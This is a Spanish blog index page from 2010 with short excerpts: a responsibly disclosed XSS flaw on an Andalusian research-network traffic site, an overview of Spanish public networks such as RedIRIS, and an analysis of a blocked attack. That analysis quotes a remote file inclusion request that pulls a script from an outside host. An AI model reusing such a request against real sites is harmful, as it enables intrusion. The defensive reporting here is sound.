Abr 302010
XSS en la web de trafico de RICA (Red informatica cientifica de andalucia)

Buscando un formación sobre las redes públicas españolas he podido descubrir un fallo leve de seguridad que ya ha sido notificado a los administradores del sitio.
El error era causado al no validar correctamente la variable “titulo”, que se usa para escribir el título de las gráficas mostradas.
Os dejo una imagen sobre el fallo.
En el ejemplo [...]

Abr 182010
Redes publicas en España

España como todos los países posé una infraestructura pública (Gestionada por Red.es) para Internet que permite a las distintas administraciones y empresas conectarse con el resto del mundo y entre sí.
La principal red española es RedIRIS.
Cito:
RedIRIS es la red académica y de investigación española y proporciona servicios
avanzados de comunicaciones a la comunidad científica y universitaria [...]

Abr 132010

Vamos a ver el último ataque que parado por SaveBot:
El atacante tenia la ip: 222.122.197.xxx y se conectó desde el puerto 33302.
El atacante procedía de Korea, de un hosting koreano con 114 hosting virtuales.
El User-Agent usado ha sido “libwww-perl/5.79″, por lo que SaveBot lo ha detenido.
El ataque:
cat=5///vwar/backup/errors.php?error=http://xxxxxxxxxxx.com/images/kontol.txt?
El dominio está registrdo en Ucrania y el hosting [...]